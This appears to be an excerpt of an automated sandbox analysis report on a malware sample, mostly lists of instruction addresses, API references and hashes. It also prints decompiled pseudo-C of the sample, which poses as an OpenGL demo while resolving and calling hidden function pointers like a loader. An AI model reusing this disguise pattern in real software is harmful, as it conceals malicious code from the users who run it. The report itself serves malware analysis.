                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b1c
                                                                                                                                                                                                                                                                          0x04006b42
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006bc9
                                                                                                                                                                                                                                                                          0x04006bd0
                                                                                                                                                                                                                                                                          0x04006b4b
                                                                                                                                                                                                                                                                          0x04006b51
                                                                                                                                                                                                                                                                          0x04006b57
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b60
                                                                                                                                                                                                                                                                          0x04006b6d
                                                                                                                                                                                                                                                                          0x04006b72
                                                                                                                                                                                                                                                                          0x04006b75
                                                                                                                                                                                                                                                                          0x04006b7b
                                                                                                                                                                                                                                                                          0x04006b82
                                                                                                                                                                                                                                                                          0x04006b84
                                                                                                                                                                                                                                                                          0x04006b87
                                                                                                                                                                                                                                                                          0x04006b8b
                                                                                                                                                                                                                                                                          0x04006b99
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006ba1
                                                                                                                                                                                                                                                                          0x04006ba7
                                                                                                                                                                                                                                                                          0x04006baa
                                                                                                                                                                                                                                                                          0x04006bb8
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006761
                                                                                                                                                                                                                                                                          0x0400676b
                                                                                                                                                                                                                                                                          0x04006775
                                                                                                                                                                                                                                                                          0x0400677f
                                                                                                                                                                                                                                                                          0x04006785
                                                                                                                                                                                                                                                                          0x04006788
                                                                                                                                                                                                                                                                          0x0400685c
                                                                                                                                                                                                                                                                          0x04006861
                                                                                                                                                                                                                                                                          0x04006864
                                                                                                                                                                                                                                                                          0x0400678e
                                                                                                                                                                                                                                                                          0x04006797
                                                                                                                                                                                                                                                                          0x040067ad
                                                                                                                                                                                                                                                                          0x040067b3
                                                                                                                                                                                                                                                                          0x040067b9
                                                                                                                                                                                                                                                                          0x040067c0
                                                                                                                                                                                                                                                                          0x040067dc
                                                                                                                                                                                                                                                                          0x040067e1
                                                                                                                                                                                                                                                                          0x040067e7
                                                                                                                                                                                                                                                                          0x040067f0
                                                                                                                                                                                                                                                                          0x040067f5
                                                                                                                                                                                                                                                                          0x040067f8
                                                                                                                                                                                                                                                                          0x040067fe
                                                                                                                                                                                                                                                                          0x04006804
                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006819
                                                                                                                                                                                                                                                                          0x0400681f
                                                                                                                                                                                                                                                                          0x0400683a
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006856
                                                                                                                                                                                                                                                                          0x0400686a
                                                                                                                                                                                                                                                                          0x04006871
                                                                                                                                                                                                                                                                          0x04006877
                                                                                                                                                                                                                                                                          0x0400687a
                                                                                                                                                                                                                                                                          0x0400687e
                                                                                                                                                                                                                                                                          0x0400688c
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006894
                                                                                                                                                                                                                                                                          0x0400689a
                                                                                                                                                                                                                                                                          0x0400689d
                                                                                                                                                                                                                                                                          0x040068a5
                                                                                                                                                                                                                                                                          0x040068aa
                                                                                                                                                                                                                                                                          0x040068ad
                                                                                                                                                                                                                                                                          0x040068b9
                                                                                                                                                                                                                                                                          0x040068bf
                                                                                                                                                                                                                                                                          0x040068c5
                                                                                                                                                                                                                                                                          0x040068c8
                                                                                                                                                                                                                                                                          0x04006902
                                                                                                                                                                                                                                                                          0x0400690a
                                                                                                                                                                                                                                                                          0x0400690d
                                                                                                                                                                                                                                                                          0x04006920
                                                                                                                                                                                                                                                                          0x04006925
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x040068ca
                                                                                                                                                                                                                                                                          0x040068d6
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x0400693a
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400694b
                                                                                                                                                                                                                                                                          0x0400695a
                                                                                                                                                                                                                                                                          0x04006971
                                                                                                                                                                                                                                                                          0x04006977
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400698a
                                                                                                                                                                                                                                                                          0x04006990
                                                                                                                                                                                                                                                                          0x04006993
                                                                                                                                                                                                                                                                          0x040069a1
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040069b0
                                                                                                                                                                                                                                                                          0x04006667
                                                                                                                                                                                                                                                                          0x0400666d
                                                                                                                                                                                                                                                                          0x04006674
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006689
                                                                                                                                                                                                                                                                          0x04006693
                                                                                                                                                                                                                                                                          0x04006698
                                                                                                                                                                                                                                                                          0x0400669b
                                                                                                                                                                                                                                                                          0x040066a7
                                                                                                                                                                                                                                                                          0x040066b8
                                                                                                                                                                                                                                                                          0x040066c6
                                                                                                                                                                                                                                                                          0x040066d5
                                                                                                                                                                                                                                                                          0x040066e4
                                                                                                                                                                                                                                                                          0x040066f0
                                                                                                                                                                                                                                                                          0x040066ff
                                                                                                                                                                                                                                                                          0x0400670e
                                                                                                                                                                                                                                                                          0x0400671d
                                                                                                                                                                                                                                                                          0x0400673a
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006642
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065fe
                                                                                                                                                                                                                                                                          0x040064ae
                                                                                                                                                                                                                                                                          0x040064b4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040064cb
                                                                                                                                                                                                                                                                          0x040064dc
                                                                                                                                                                                                                                                                          0x040064ed
                                                                                                                                                                                                                                                                          0x040064f2
                                                                                                                                                                                                                                                                          0x0400651a
                                                                                                                                                                                                                                                                          0x0400653f
                                                                                                                                                                                                                                                                          0x04006545
                                                                                                                                                                                                                                                                          0x0400654c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006552
                                                                                                                                                                                                                                                                          0x0400655c
                                                                                                                                                                                                                                                                          0x0400657e
                                                                                                                                                                                                                                                                          0x04006584
                                                                                                                                                                                                                                                                          0x04006586
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x0400658e
                                                                                                                                                                                                                                                                          0x04006591
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065a0
                                                                                                                                                                                                                                                                          0x040065a6
                                                                                                                                                                                                                                                                          0x040065b2
                                                                                                                                                                                                                                                                          0x040065b7
                                                                                                                                                                                                                                                                          0x040065ba
                                                                                                                                                                                                                                                                          0x040065c0
                                                                                                                                                                                                                                                                          0x040065c7
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x040065c9
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x04006464
                                                                                                                                                                                                                                                                          0x0400646d
                                                                                                                                                                                                                                                                          0x04006476
                                                                                                                                                                                                                                                                          0x04006479
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400647b
                                                                                                                                                                                                                                                                          0x04006c33
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x04006c44
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                          • String ID: Kobucgekyxca$TEMP$TEMP
                                                                                                                                                                                                                                                                          • API String ID: 2087232378-2361037019
                                                                                                                                                                                                                                                                          • Opcode ID: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                                                                          			E004015A6(struct HINSTANCE__* _a4) {
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				struct HWND__* _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				long _v68;
                                                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                          				struct _WNDCLASSA _v120;
                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                          				int _v164;
                                                                                                                                                                                                                                                                          				int _v168;
                                                                                                                                                                                                                                                                          				int _v172;
                                                                                                                                                                                                                                                                          				int _v176;
                                                                                                                                                                                                                                                                          				intOrPtr _v188;
                                                                                                                                                                                                                                                                          				int _v192;
                                                                                                                                                                                                                                                                          				int _v196;
                                                                                                                                                                                                                                                                          				int _v212;
                                                                                                                                                                                                                                                                          				int _v216;
                                                                                                                                                                                                                                                                          				intOrPtr _v228;
                                                                                                                                                                                                                                                                          				int _v232;
                                                                                                                                                                                                                                                                          				intOrPtr _v236;
                                                                                                                                                                                                                                                                          				intOrPtr _v248;
                                                                                                                                                                                                                                                                          				char _v252;
                                                                                                                                                                                                                                                                          				int _v256;
                                                                                                                                                                                                                                                                          				intOrPtr _v268;
                                                                                                                                                                                                                                                                          				struct HWND__* _t107;
                                                                                                                                                                                                                                                                          				long _t128;
                                                                                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                          				void* _t181;
                                                                                                                                                                                                                                                                          				struct HWND__** _t183;
                                                                                                                                                                                                                                                                          				int* _t185;
                                                                                                                                                                                                                                                                          				intOrPtr* _t187;
                                                                                                                                                                                                                                                                          				int* _t189;
                                                                                                                                                                                                                                                                          				int* _t191;
                                                                                                                                                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                                                                                                                                                          				intOrPtr* _t193;
                                                                                                                                                                                                                                                                          				int* _t194;
                                                                                                                                                                                                                                                                          				intOrPtr* _t197;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_v120.style = 0x20;
                                                                                                                                                                                                                                                                          				_v120.lpfnWndProc = E004019EF;
                                                                                                                                                                                                                                                                          				_v120.cbClsExtra = 0;
                                                                                                                                                                                                                                                                          				_v120.cbWndExtra = 0;
                                                                                                                                                                                                                                                                          				_v120.hInstance = _a4;
                                                                                                                                                                                                                                                                          				_v120.hIcon = LoadIconA(0, 0x7f00);
                                                                                                                                                                                                                                                                          				_v120.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                                                                          				_v120.hbrBackground = GetStockObject(4);
                                                                                                                                                                                                                                                                          				_v120.lpszMenuName = 0;
                                                                                                                                                                                                                                                                          				_v120.lpszClassName = "GLSample";
                                                                                                                                                                                                                                                                          				RegisterClassA( &_v120);
                                                                                                                                                                                                                                                                          				ShowWindow(_v24, 0); // executed
                                                                                                                                                                                                                                                                          				_t107 = CreateWindowExA(0, "GLSample", "OpenGL Sample", 0x80c80000, 0, 0, 0x100, 0x100, 0, 0, _a4, 0); // executed
                                                                                                                                                                                                                                                                          				_t181 = _t174 - 0x50;
                                                                                                                                                                                                                                                                          				_v24 = _t107;
                                                                                                                                                                                                                                                                          				_v28 = 0xa93;
                                                                                                                                                                                                                                                                          				_v32 = 0x63c;
                                                                                                                                                                                                                                                                          				_v76 = 0;
                                                                                                                                                                                                                                                                          				_v80 = 0;
                                                                                                                                                                                                                                                                          				if((E0040140E(_t107) & 0xffffff00 | _t108 != 0x00000000) != 0) {
                                                                                                                                                                                                                                                                          					ExitProcess(0xffffa883);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *0x403000 = 0;
                                                                                                                                                                                                                                                                          				 *0x403004 = 0;
                                                                                                                                                                                                                                                                          				 *0x403008 = 0;
                                                                                                                                                                                                                                                                          				 *0x403010 = 0;
                                                                                                                                                                                                                                                                          				 *0x40300c = 0;
                                                                                                                                                                                                                                                                          				 *0x403014 = 0;
                                                                                                                                                                                                                                                                          				 *0x405020 = 0x270034da;
                                                                                                                                                                                                                                                                          				E00401479(_v28,  &_v80); // executed
                                                                                                                                                                                                                                                                          				E00401479(_v32,  &_v76); // executed
                                                                                                                                                                                                                                                                          				memset(0x405008, 0, 0x18 << 0);
                                                                                                                                                                                                                                                                          				 *0x405008 = 0;
                                                                                                                                                                                                                                                                          				 *0x40500c = 1;
                                                                                                                                                                                                                                                                          				 *0x405010 = _v76;
                                                                                                                                                                                                                                                                          				_v176 = 0x405008;
                                                                                                                                                                                                                                                                          				 *_v80();
                                                                                                                                                                                                                                                                          				_t183 = _t181 + 0xc - 4;
                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                          				_v176 = 0x47754b17;
                                                                                                                                                                                                                                                                          				 *_t183 =  *0x405018;
                                                                                                                                                                                                                                                                          				_v36 = E00401362();
                                                                                                                                                                                                                                                                          				 *_v36();
                                                                                                                                                                                                                                                                          				_v172 =  &_v44;
                                                                                                                                                                                                                                                                          				_v176 =  &_v40;
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				_t128 = E00401A87();
                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                          				if((_t128 & 0xffffff00 | _v16 == 0x00000000) != 0) {
                                                                                                                                                                                                                                                                          					_v164 = 1;
                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                          					_v172 = 0;
                                                                                                                                                                                                                                                                          					_v176 = 0;
                                                                                                                                                                                                                                                                          					 *_t183 =  &_v72;
                                                                                                                                                                                                                                                                          					_t131 = PeekMessageA(??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                          					_t183 = _t183 - 0x14;
                                                                                                                                                                                                                                                                          					if((_t131 & 0xffffff00 | _t131 != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                          						_v168 = 0;
                                                                                                                                                                                                                                                                          						_v172 = 0;
                                                                                                                                                                                                                                                                          						_v176 = 0;
                                                                                                                                                                                                                                                                          						 *_t183 = 0;
                                                                                                                                                                                                                                                                          						L00401B8C();
                                                                                                                                                                                                                                                                          						_v196 = 0x4000;
                                                                                                                                                                                                                                                                          						L00401B94();
                                                                                                                                                                                                                                                                          						_t185 = _t183 - 0xc;
                                                                                                                                                                                                                                                                          						L00401B9C();
                                                                                                                                                                                                                                                                          						_v188 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v192 = 0;
                                                                                                                                                                                                                                                                          						_v196 = 0;
                                                                                                                                                                                                                                                                          						 *_t185 = _v20;
                                                                                                                                                                                                                                                                          						L00401BA4();
                                                                                                                                                                                                                                                                          						_v216 = 4;
                                                                                                                                                                                                                                                                          						L00401BAC();
                                                                                                                                                                                                                                                                          						_t187 = _t185 - 0xc;
                                                                                                                                                                                                                                                                          						_v212 = 0;
                                                                                                                                                                                                                                                                          						_v216 = 0;
                                                                                                                                                                                                                                                                          						 *_t187 = 0x3f800000;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_v228 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v232 = 0;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t189 = _t187 - 4;
                                                                                                                                                                                                                                                                          						_v232 = 0;
                                                                                                                                                                                                                                                                          						_v236 = 0x3f800000;
                                                                                                                                                                                                                                                                          						 *_t189 = 0;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_v248 = 0xbf000000;
                                                                                                                                                                                                                                                                          						_v252 = 0x3f5eb852;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t191 = _t189 - 4;
                                                                                                                                                                                                                                                                          						_v252 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v256 = 0;
                                                                                                                                                                                                                                                                          						 *_t191 = 0;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_t192 = _t191 - 0xc;
                                                                                                                                                                                                                                                                          						_v268 = 0xbf000000;
                                                                                                                                                                                                                                                                          						 *_t192 = 0xbf5eb852;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t193 = _t192 - 8;
                                                                                                                                                                                                                                                                          						L00401BC4();
                                                                                                                                                                                                                                                                          						L00401BCC();
                                                                                                                                                                                                                                                                          						 *_t193 = _v40;
                                                                                                                                                                                                                                                                          						_t128 = SwapBuffers(??);
                                                                                                                                                                                                                                                                          						_t194 = _t193 - 4;
                                                                                                                                                                                                                                                                          						asm("fld1");
                                                                                                                                                                                                                                                                          						asm("faddp st1, st0");
                                                                                                                                                                                                                                                                          						 *_t194 = 1;
                                                                                                                                                                                                                                                                          						Sleep(??);
                                                                                                                                                                                                                                                                          						_t183 = _t194 - 4;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t128 = _v68;
                                                                                                                                                                                                                                                                          						if(_t128 != 0x12) {
                                                                                                                                                                                                                                                                          							 *_t183 =  &_v72;
                                                                                                                                                                                                                                                                          							TranslateMessage(??);
                                                                                                                                                                                                                                                                          							_t197 = _t183 - 4;
                                                                                                                                                                                                                                                                          							 *_t197 =  &_v72;
                                                                                                                                                                                                                                                                          							_t128 = DispatchMessageA(??);
                                                                                                                                                                                                                                                                          							_t183 = _t197 - 4;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v16 = 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v172 = _v44;
                                                                                                                                                                                                                                                                          				_v176 = _v40;
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				E00401B48();
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				DestroyWindow(??);
                                                                                                                                                                                                                                                                          				return _v64;
                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                          0x004015b1
                                                                                                                                                                                                                                                                          0x004015bd
                                                                                                                                                                                                                                                                          0x004015c0
                                                                                                                                                                                                                                                                          0x004015c7
                                                                                                                                                                                                                                                                          0x004015ce
                                                                                                                                                                                                                                                                          0x004015d5
                                                                                                                                                                                                                                                                          0x004015df
                                                                                                                                                                                                                                                                          0x004015f9
                                                                                                                                                                                                                                                                          0x00401613
                                                                                                                                                                                                                                                                          0x00401625
                                                                                                                                                                                                                                                                          0x00401628
                                                                                                                                                                                                                                                                          0x0040162f
                                                                                                                                                                                                                                                                          0x0040163c
                                                                                                                                                                                                                                                                          0x00401652
                                                                                                                                                                                                                                                                          0x004016b8
                                                                                                                                                                                                                                                                          0x004016bd
                                                                                                                                                                                                                                                                          0x004016c0
                                                                                                                                                                                                                                                                          0x004016c3
                                                                                                                                                                                                                                                                          0x004016ca
                                                                                                                                                                                                                                                                          0x004016d1
                                                                                                                                                                                                                                                                          0x004016d8
                                                                                                                                                                                                                                                                          0x004016eb
                                                                                                                                                                                                                                                                          0x004016f4
                                                                                                                                                                                                                                                                          0x004016f4
                                                                                                                                                                                                                                                                          0x004016f9
                                                                                                                                                                                                                                                                          0x00401703
                                                                                                                                                                                                                                                                          0x0040170d
                                                                                                                                                                                                                                                                          0x00401717
                                                                                                                                                                                                                                                                          0x00401721
                                                                                                                                                                                                                                                                          0x0040172b
                                                                                                                                                                                                                                                                          0x00401735
                                                                                                                                                                                                                                                                          0x0040174c
                                                                                                                                                                                                                                                                          0x0040175e
                                                                                                                                                                                                                                                                          0x00401773
                                                                                                                                                                                                                                                                          0x00401775
                                                                                                                                                                                                                                                                          0x0040177f
                                                                                                                                                                                                                                                                          0x0040178c
                                                                                                                                                                                                                                                                          0x00401794
                                                                                                                                                                                                                                                                          0x0040179b
                                                                                                                                                                                                                                                                          0x0040179d
                                                                                                                                                                                                                                                                          0x004017a0
                                                                                                                                                                                                                                                                          0x004017b2
                                                                                                                                                                                                                                                                          0x004017ba
                                                                                                                                                                                                                                                                          0x004017c2
                                                                                                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                                                                                                          0x004017cd
                                                                                                                                                                                                                                                                          0x004017d4
                                                                                                                                                                                                                                                                          0x004017db
                                                                                                                                                                                                                                                                          0x004017de
                                                                                                                                                                                                                                                                          0x004019ad
                                                                                                                                                                                                                                                                          0x004019b6
                                                                                                                                                                                                                                                                          0x004017e8
                                                                                                                                                                                                                                                                          0x004017f0
                                                                                                                                                                                                                                                                          0x004017f8
                                                                                                                                                                                                                                                                          0x00401800
                                                                                                                                                                                                                                                                          0x0040180b
                                                                                                                                                                                                                                                                          0x0040180e
                                                                                                                                                                                                                                                                          0x00401813
                                                                                                                                                                                                                                                                          0x0040181d
                                                                                                                                                                                                                                                                          0x00401859
                                                                                                                                                                                                                                                                          0x00401862
                                                                                                                                                                                                                                                                          0x0040186b
                                                                                                                                                                                                                                                                          0x00401874
                                                                                                                                                                                                                                                                          0x00401877
                                                                                                                                                                                                                                                                          0x0040187f
                                                                                                                                                                                                                                                                          0x00401886
                                                                                                                                                                                                                                                                          0x0040188b
                                                                                                                                                                                                                                                                          0x0040188e
                                                                                                                                                                                                                                                                          0x00401898
                                                                                                                                                                                                                                                                          0x004018a1
                                                                                                                                                                                                                                                                          0x004018aa
                                                                                                                                                                                                                                                                          0x004018b1
                                                                                                                                                                                                                                                                          0x004018b4
                                                                                                                                                                                                                                                                          0x004018bc
                                                                                                                                                                                                                                                                          0x004018c3
                                                                                                                                                                                                                                                                          0x004018c8
                                                                                                                                                                                                                                                                          0x004018d0
                                                                                                                                                                                                                                                                          0x004018d9
                                                                                                                                                                                                                                                                          0x004018e2
                                                                                                                                                                                                                                                                          0x004018e5
                                                                                                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                                                                                                          0x004018fb
                                                                                                                                                                                                                                                                          0x004018fe
                                                                                                                                                                                                                                                                          0x00401903
                                                                                                                                                                                                                                                                          0x0040190b
                                                                                                                                                                                                                                                                          0x00401914
                                                                                                                                                                                                                                                                          0x0040191d
                                                                                                                                                                                                                                                                          0x00401920
                                                                                                                                                                                                                                                                          0x0040192d
                                                                                                                                                                                                                                                                          0x00401936
                                                                                                                                                                                                                                                                          0x00401939
                                                                                                                                                                                                                                                                          0x0040193e
                                                                                                                                                                                                                                                                          0x00401946
                                                                                                                                                                                                                                                                          0x0040194f
                                                                                                                                                                                                                                                                          0x00401958
                                                                                                                                                                                                                                                                          0x0040195b
                                                                                                                                                                                                                                                                          0x00401960
                                                                                                                                                                                                                                                                          0x00401968
                                                                                                                                                                                                                                                                          0x00401971
                                                                                                                                                                                                                                                                          0x00401974
                                                                                                                                                                                                                                                                          0x00401979
                                                                                                                                                                                                                                                                          0x0040197c
                                                                                                                                                                                                                                                                          0x00401981
                                                                                                                                                                                                                                                                          0x00401989
                                                                                                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                                                                                                          0x00401991
                                                                                                                                                                                                                                                                          0x00401997
                                                                                                                                                                                                                                                                          0x00401999
                                                                                                                                                                                                                                                                          0x0040199e
                                                                                                                                                                                                                                                                          0x004019a5
                                                                                                                                                                                                                                                                          0x004019aa
                                                                                                                                                                                                                                                                          0x0040181f
                                                                                                                                                                                                                                                                          0x0040181f
                                                                                                                                                                                                                                                                          0x00401825
                                                                                                                                                                                                                                                                          0x00401836
                                                                                                                                                                                                                                                                          0x00401839
                                                                                                                                                                                                                                                                          0x0040183e
                                                                                                                                                                                                                                                                          0x00401844
                                                                                                                                                                                                                                                                          0x00401847
                                                                                                                                                                                                                                                                          0x0040184c
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401825
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040181d
                                                                                                                                                                                                                                                                          0x004019c2
                                                                                                                                                                                                                                                                          0x004019c6
                                                                                                                                                                                                                                                                          0x004019cd
                                                                                                                                                                                                                                                                          0x004019d0
                                                                                                                                                                                                                                                                          0x004019d8
                                                                                                                                                                                                                                                                          0x004019db
                                                                                                                                                                                                                                                                          0x004019ec

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
